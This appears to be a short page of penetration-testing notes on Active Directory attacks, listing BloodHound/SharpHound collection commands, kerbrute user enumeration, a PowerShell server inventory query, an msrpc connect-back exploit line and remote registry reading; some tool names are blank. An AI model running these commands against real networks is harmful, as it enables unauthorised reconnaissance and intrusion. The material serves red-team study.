Domain Enum & Exploitation



Sharhound.exe -c all,gpolocalgroup

Via Covenant

Assembly /assemblyname:"winsrv" /parameters:"\"-c All GPOLocalGroup\""

Via Impacket

bloodhound-python -c all -u <user> -p <password> -d <domain> -dc <> -ns <optional nameserver>

Sometimes this results in a dns timeout, in this case we can use

sudo sh -c 'python3 --fakeip <dc ip> --fakedomains <domain> -q'


ACLight is a great script that finds high privileged accounts by using PowerView and then creates a report.

Find OS Versions

[Get-ADComputer -Filter {(OperatingSystem -like '*Server 2012*')} -Properties * | sort-Object | Select-Object DNSHostName, IPv4Address, whenCreated, OperatingSystem]



kerbrute userenum -d <domain> <userlist> --dc <>


Explore a flaw in msrpc to get a connect back from a vulnerable server via

python <domain>/<user>@<rhost> <lhost>

Read Remote Registry

We can read a remote machines registry with Service Ticket (which can be generated with "" if we have the creds or hash of a user) and "runas /netonly". This only works if the user we are targeting has a session on the target system (check in bloodhound).

Last updated